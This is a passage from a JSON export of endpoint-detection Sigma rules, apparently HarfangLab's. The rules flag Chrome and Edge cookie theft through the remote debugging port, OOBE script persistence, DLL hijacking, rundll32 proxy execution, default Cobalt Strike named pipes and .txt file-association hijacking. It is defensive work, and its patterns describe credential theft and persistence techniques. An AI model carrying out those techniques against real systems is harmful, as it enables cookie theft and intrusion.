selection_debug:\n CommandLine|contains: '--remote-debugging-port'\n\n selection_profile:\n CommandLine|contains: '--profile-directory'\n\n selection_datadir1:\n CommandLine|contains: '--user-data-dir'\n\n selection_datadir2:\n CommandLine|contains:\n - '\\Library\\Application Support\\Google\\Chrome'\n - '\\AppData\\Local\\Google\\Chrome\\User Data'\n\n # Used by Rhadamanthys stealer\n # https://any.run/report/7ac46862182e38faa8d46cdd384b47c45b4c4c28a898746248de845625c08f5a/eb3faa14-7861-439e-9664-ea1dc0185a35\n selection_window:\n CommandLine|contains|all:\n - '--explicitly-allowed-ports'\n - '--new-window'\n\n filter_legitimate:\n CommandLine|contains: '--remote-debugging-port=0'\n\n exclusion_testcomplete:\n ParentImage|endswith: '\\TestComplete.exe'\n Signed: 'true'\n Company: 'SmartBear'\n\n exclusion_testcomplete_2:\n GrandparentImage|endswith: '\\TestComplete.exe'\n Signed: 'true'\n Company: 'SmartBear'\n\n condition: selection_image and ((selection_debug and (selection_profile or (all of selection_datadir*))) or selection_window) and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "666add95-2a14-413a-8118-e37d63ce67e7",
"rule_name": "Possible Attempt to Steal Chrome Cookies via Remote Debugging",
"rule_description": "This rule detects Chrome being launched with a remote debugging port and a user data directory option pointing to Chrome's User Data or Debug directory.\nThis allows an attacker to subsequently issue requests to the Chrome application and retrieve user cookies; they are decrypted by Chrome itself and sent through the debug port.\nThis technique is usually accompanied by adding the Cursed Chrome extension to the browser; it is recommended to investigate the extensions present on the browser.\nA guide is present in the references.\nFalse positives may occur in one of the cases below:\n - The default Chrome debugging port is 9222; it may be used by web developers, but it might also indicate an attacker trying to disguise themselves as a legitimate user.\n - When this technique is used, the --user-data-dir or --headless options are used, but these may not be necessary if it is executed through PowerShell.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-04-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "666da981-8237-4850-9529-ff7a5cd34116",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074596Z",
"creation_date": "2026-03-23T11:45:34.074598Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074603Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BishopFox/sliver/wiki/Cursed",
"https://mango.pdf.zone/stealing-chrome-cookies-without-a-password",
"https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/",
"https://spycloud.com/blog/infostealers-bypass-new-chrome-security-feature/",
"https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/",
"https://null-byte.wonderhowto.com/how-to/analyze-web-browser-extensions-for-possible-malware-other-malicious-activity-0236335/",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1539_cursed_cookies_edge.yml",
"content": "title: Possible Attempt to Steal Edge Cookies via Remote Debugging\nid: 666da981-8237-4850-9529-ff7a5cd34116\ndescription: |\n Detects Edge being launched with a remote debugging port and a user data directory option pointed to a Edge's User Data or Debug directory.\n This allows an attacker to subsequently issue requests to the Edge application and retrieve user cookies, they will be decrypted by Edge itself and sent through the Debug Port.\n This technique is usually accompanied by adding the Cursed Chrome extension to the browser, it is recommended to investigate extensions present on the browser. A guide is present in the references.\n It is recommended to investigate the parent process to determine the legitimacy of this action.\nreferences:\n - https://github.com/BishopFox/sliver/wiki/Cursed\n - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password\n - https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/\n - https://spycloud.com/blog/infostealers-bypass-new-chrome-security-feature/\n - https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/\n - https://null-byte.wonderhowto.com/how-to/analyze-web-browser-extensions-for-possible-malware-other-malicious-activity-0236335/\n - https://attack.mitre.org/techniques/T1539/\ndate: 2023/03/24\nmodified: 2025/08/19\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_image:\n Image|endswith: '\\msedge.exe'\n\n selection_profile:\n CommandLine|contains|all:\n - '--remote-debugging-port'\n - '--profile-directory'\n\n selection_datadir1:\n CommandLine|contains|all:\n - '--remote-debugging-port'\n - '--user-data-dir'\n\n selection_datadir2:\n CommandLine|contains:\n - '\\Library\\Application Support\\Microsoft\\Edge'\n - 
'\\AppData\\Local\\Microsoft\\Edge\\User Data'\n\n # Used by Rhadamanthys stealer\n # https://any.run/report/7ac46862182e38faa8d46cdd384b47c45b4c4c28a898746248de845625c08f5a/eb3faa14-7861-439e-9664-ea1dc0185a35\n selection_window:\n CommandLine|contains|all:\n - '--explicitly-allowed-ports'\n - '--new-window'\n\n filter_legitimate:\n CommandLine|contains: '--remote-debugging-port=0'\n\n condition: selection_image and (selection_profile or all of selection_datadir* or selection_window) and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "666da981-8237-4850-9529-ff7a5cd34116",
"rule_name": "Possible Attempt to Steal Edge Cookies via Remote Debugging",
"rule_description": "Detects Edge being launched with a remote debugging port and a user data directory option pointing to Edge's User Data or Debug directory.\nThis allows an attacker to subsequently issue requests to the Edge application and retrieve user cookies; they are decrypted by Edge itself and sent through the debug port.\nThis technique is usually accompanied by adding the Cursed Chrome extension to the browser; it is recommended to investigate the extensions present on the browser. A guide is present in the references.\nIt is recommended to investigate the parent process to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-08-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6672ee8f-9e54-4cf9-8906-b4a7a71812b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085926Z",
"creation_date": "2026-03-23T11:45:34.085928Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085933Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2024/02/05/persistence-windows-setup-script/",
"https://attack.mitre.org/techniques/T1554/"
],
"name": "t1554_windows_setup_script_persistence_executed.yml",
"content": "title: Windows Out of Box Experience Persistence Executed\nid: 6672ee8f-9e54-4cf9-8906-b4a7a71812b1\ndescription: |\n Detects the execution of a process related to the Windows Out of Box Experience (OOBE).\n The script \"%WINDIR%\\Setup\\Scripts\\ErrorHandler.cmd\" is executed whenever tools under the \"C:\\WINDOWS\\System32\\oobe\" directory fail to run for any reason.\n This is, for example, the case for the Windows setup binary that is executed when the Windows operating system is installed or upgraded.\n An adversary can use this technique to execute malicious code persistently.\n It is recommended to investigate the \"%WINDIR%\\Setup\\Scripts\\ErrorHandler.cmd\" script to determine the legitimacy of its content.\nreferences:\n - https://pentestlab.blog/2024/02/05/persistence-windows-setup-script/\n - https://attack.mitre.org/techniques/T1554/\ndate: 2024/02/05\nmodified: 2025/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1554\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\Setup\\Scripts\\ErrorHandler.cmd'\n GrandparentImage|startswith: '?:\\Windows\\System32\\oobe\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6672ee8f-9e54-4cf9-8906-b4a7a71812b1",
"rule_name": "Windows Out of Box Experience Persistence Executed",
"rule_description": "Detects the execution of a process related to the Windows Out of Box Experience (OOBE).\nThe script \"%WINDIR%\\Setup\\Scripts\\ErrorHandler.cmd\" is executed whenever tools under the \"C:\\WINDOWS\\System32\\oobe\" directory fail to run for any reason.\nThis is, for example, the case for the Windows setup binary that is executed when the Windows operating system is installed or upgraded.\nAn adversary can use this technique to execute malicious code persistently.\nIt is recommended to investigate the \"%WINDIR%\\Setup\\Scripts\\ErrorHandler.cmd\" script to determine the legitimacy of its content.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1554"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6673e47f-a4ed-4de4-928c-1d6b6f36f56a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075524Z",
"creation_date": "2026-03-23T11:45:34.075526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075531Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://twitter.com/0xcarnage/status/1203882560176218113",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdeunlock.yml",
"content": "title: DLL Hijacking via BDEUNLOCK.EXE.exe\nid: 6673e47f-a4ed-4de4-928c-1d6b6f36f56a\ndescription: |\n Detects potential Windows DLL Hijacking via BDEUNLOCK.EXE.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://twitter.com/0xcarnage/status/1203882560176218113\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BDEUNLOCK.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\duser.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6673e47f-a4ed-4de4-928c-1d6b6f36f56a",
"rule_name": "DLL Hijacking via BDEUNLOCK.EXE.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BDEUNLOCK.EXE.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "676e902b-c810-4fde-b1d6-1fa958a5adb1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626153Z",
"creation_date": "2026-03-23T11:45:34.626155Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626159Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/florylsk/ExecIT/tree/master",
"https://attack.mitre.org/techniques/T1218.011"
],
"name": "t1218_011_rundll32_loads_unsigned_dll.yml",
"content": "title: Unsigned DLL Loaded by Rundll32 from Suspicious Folder\nid: 676e902b-c810-4fde-b1d6-1fa958a5adb1\ndescription: |\n Detects an unsigned DLL being loaded by \"rundll32.exe\" from an unusual folder.\n This can be an attempt to proxy malicious execution through the Microsoft signed binary \"rundll32.exe\".\n It is recommended to investigate the process that spawned \"rundll32.exe\", the loaded library and the processes spawned by \"rundll32.exe\".\nreferences:\n - https://github.com/florylsk/ExecIT/tree/master\n - https://attack.mitre.org/techniques/T1218.011\ndate: 2024/01/29\nmodified: 2026/01/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\rundll32.exe'\n ImageLoaded|startswith:\n - '?:\\Users\\'\n - '?:\\Windows\\Temp\\'\n - '?:\\Windows\\Tasks\\'\n\n filter_signed:\n Signed: 'true'\n\n exclusion_msi:\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI????.tmp'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\?\\MSI????.tmp'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI????.tmp-*\\\\*.dll'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI???.tmp-*\\\\*.dll'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI??.tmp-*\\\\*.dll'\n # - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\?\\MSI????.tmp-*\\\\*.dll'\n ImageLoaded|re: '(?i)^(?:[A-Z]:)(?:(?:\\\\Windows\\\\temp\\\\)|(?:\\\\Users\\\\[^\\\\]*\\\\appdata\\\\local\\\\temp\\\\))(?:[A-Z0-9]{1}\\\\)?(?:MSI[A-Z0-9]{1,4}\\.tmp)(?:-\\\\[^\\\\]*\\.dll)?'\n\n exclusion_custom_actions:\n # '?:\\Windows\\Temp\\_is????.tmp'\n # '?:\\Windows\\Temp\\_is????.tmp-\\CustomActions.dll'\n # '?:\\Windows\\Temp\\_is???.tmp-\\CustomActions.dll'\n # Same in appdata\\local\\temp folder\n ImageLoaded|re: 
'(?i)^(?:[A-Z]:)(?:(?:\\\\Windows\\\\temp\\\\)|(?:\\\\Users\\\\[^\\\\]*\\\\appdata\\\\local\\\\temp\\\\))(?:_is[A-Z0-9]{1,4}\\.tmp)(?:-\\\\CustomActions\\.dll)?'\n\n exclusion_custom_actions_dotnet:\n ProcessCommandLine|contains: '\\MSI????.tmp,zzzzInvokeManagedCustomActionOutOfProc Sfx'\n ImageLoaded:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\SFX*\\\\*.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\MSI????.tmp-\\\\*.dll'\n - '?:\\Users\\\\*\\Temp\\\\*\\SFX*\\\\*.dll'\n - '?:\\Users\\\\*\\Temp\\\\*\\MSI????.tmp'\n - '?:\\Users\\\\*\\Temp\\MSI????.tmp-\\\\*.dll'\n - '?:\\Windows\\Temp\\CustomActions.NET.CA.dll'\n - '?:\\Windows\\Temp\\CustomActions.NET.CA.dll-*\\\\*.dll'\n - '?:\\Windows\\Temp\\CustomActions.CA.dll-*\\\\*.dll'\n\n exclusion_evernote:\n ImageLoaded|startswith: '?:\\users\\\\*\\appdata\\local\\apps\\evernote\\evernote\\'\n\n exclusion_webex:\n ImageLoaded|startswith:\n - '?:\\users\\\\*\\appdata\\local\\webex\\webex64\\meetings\\'\n - '?:\\users\\\\*\\appdata\\local\\webex\\webex\\meetings\\x64\\'\n\n exclusion_netdrive:\n ImageLoaded: '?:\\users\\\\*\\netdrive2\\ex\\nd2ex.dll'\n\n exclusion_gotomeeting:\n ImageLoaded|endswith: '\\gotomeeting\\\\*\\uninshlp.dll'\n\n exclusion_install_navigator:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\\\*\\install navigator\\e_upwj01.dll'\n\n exclusion_httptousbridge:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\httptousbbridge\\x64\\brdifxapi64.exe'\n\n exclusion_diagonal_hook:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\[diagonal_hook_tmp]\\_dm_hook_????????.dll'\n\n exclusion_agent_wixsharp:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\msi????.tmp-\\agent wixsharp.exe'\n\n exclusion_viva:\n ImageLoaded: '?:\\users\\\\*\\appdata\\roaming\\viva_01.dll'\n\n exclusion_vmware:\n ImageLoaded: '?:\\windows\\temp\\rubrik_vmware*\\rbkvssprovider.dll'\n\n exclusion_dxcap:\n ImageLoaded:\n - '?:\\users\\\\*\\appdata\\local\\temp\\clickshare_*\\dxcap.dll'\n - 
'?:\\users\\\\*\\appdata\\local\\temp\\clickshare_*\\dxcap64.dll'\n\n exclusion_pkgutility:\n ImageLoaded: '?:\\windows\\temp\\{????????-????-????-????-????????????}\\{????????-????-????-????-????????????}\\pkgutility.dll'\n\n exclusion_interprocess:\n ImageLoaded: '?:\\users\\\\*\\appdata\\local\\temp\\\\????????-????-????-????-????????????\\interprocessdll.x64.dll'\n\n exclusion_assembly:\n ImageLoaded|startswith: '?:\\Users\\\\*\\appdata\\local\\assembly\\'\n\n exclusion_ktoutlk:\n OriginalFileName: 'KTOutlk.DLL'\n\n exclusion_aepdu:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate'\n\n exclusion_kerio:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Local\\Temp\\koffupdate{????????-????-????-????-????????????}\\\\*.dll'\n\n exclusion_bmc:\n ProcessCommandLine|contains: 'rundll32.exe IsolatedPluginHost.dll,IHInit AppSight.BlackBox.IsolatedPlugin.Isolated'\n\n exclusion_blackbox:\n ProcessCommandLine|endswith:\n - 'rundll32.exe DXCap.dll,DXCap_Hook'\n - 'rundll32.exe DXCap64.dll,DXCap_Hook'\n ImageLoaded|endswith:\n - '\\Black Box WHPS\\DXCap.dll'\n - '\\Black Box WHPS\\DXCap64.dl'\n\n exclusion_nch_software:\n ImageLoaded: '?:\\Users\\\\*\\AppData\\Roaming\\NCH Software\\Program Files\\FastFox\\ffhook64.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "676e902b-c810-4fde-b1d6-1fa958a5adb1",
"rule_name": "Unsigned DLL Loaded by Rundll32 from Suspicious Folder",
"rule_description": "Detects an unsigned DLL being loaded by \"rundll32.exe\" from an unusual folder.\nThis can be an attempt to proxy malicious execution through the Microsoft signed binary \"rundll32.exe\".\nIt is recommended to investigate the process that spawned \"rundll32.exe\", the loaded library and the processes spawned by \"rundll32.exe\".\n",
"rule_creation_date": "2024-01-29",
"rule_modified_date": "2026-01-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "67c99899-5e5d-4fd3-96a6-74eb3db90d9d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072940Z",
"creation_date": "2026-03-23T11:45:34.072942Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072946Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
"https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/"
],
"name": "t1021_002_default_cobaltstrike_named_pipes_creation.yml",
"content": "title: Default CobaltStrike Named Pipe Created\nid: 67c99899-5e5d-4fd3-96a6-74eb3db90d9d\ndescription: |\n Detects the creation of a named pipe pertaining to the CobaltStrike framework.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to isolate infected hosts and to start incident response to determine the origin of the CobaltStrike beacon.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\ndate: 2022/07/08\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection_utilities:\n PipeName|endswith:\n # Cobalt Strike [3.x - 4.2]\n - '\\sshagent'\n - '\\portscan'\n - '\\keylogger'\n - '\\netview'\n - '\\screenshot'\n\n selection_msse:\n # Default cobalt are usually in the MSSE-???-server form\n # but have also been spotted with a smaller or higher number\n # of random chars, better make it generic to be sure\n PipeName|endswith: '\\MSSE-*-server'\n\n selection_other:\n # Startswith here allows to match all prefixes\n PipeName|startswith:\n - '\\msagent_'\n - '\\status_'\n - '\\postex_ssh_'\n - '\\postex_'\n - '\\interprocess_'\n - '\\samr_'\n - '\\netlogon_'\n - '\\srvsvc_'\n - '\\lsarpc_'\n\n condition: 1 of selection_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "67c99899-5e5d-4fd3-96a6-74eb3db90d9d",
"rule_name": "Default CobaltStrike Named Pipe Created",
"rule_description": "Detects the creation of a named pipe pertaining to the CobaltStrike framework.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to isolate infected hosts and to start incident response to determine the origin of the CobaltStrike beacon.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "67d6a3a7-1abe-47fe-acb8-674865f2c31e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076111Z",
"creation_date": "2026-03-23T11:45:34.076113Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076118Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md",
"https://www.ired.team/offensive-security/persistence/hijacking-default-file-extension",
"https://attack.mitre.org/techniques/T1546/001/"
],
"name": "t1546_001_change_default_file_association.yml",
"content": "title: Default Text File Association Changed in Registry\nid: 67d6a3a7-1abe-47fe-acb8-674865f2c31e\ndescription: |\n Detects the modification of the default program to open a text file in the registry.\n Attackers may establish persistence by setting the default program to open a specific file type to a malicious executable.\n This malicious executable is then started when a file presenting the extension is opened by a user.\n It is recommended to investigate the value of the registry modification as well as the process performing the modification to determine the legitimacy of this action.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md\n - https://www.ired.team/offensive-security/persistence/hijacking-default-file-extension\n - https://attack.mitre.org/techniques/T1546/001/\ndate: 2022/11/07\nmodified: 2026/01/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # Other extensions could be added later\n TargetObject|contains:\n # This key usually contains 'txtfile', the handler for .txt extension\n - 'HKCR\\.txt\\(Default)'\n # the key HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command contains the path to the default binary to perform [action] on files with extension having the txtfile handler\n - 'HKCR\\txtfile\\shell\\\\*\\command'\n # Local config\n - 'HKU\\S*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.txt\\UserChoice\\ProdId'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_programfiles:\n Details|contains:\n - 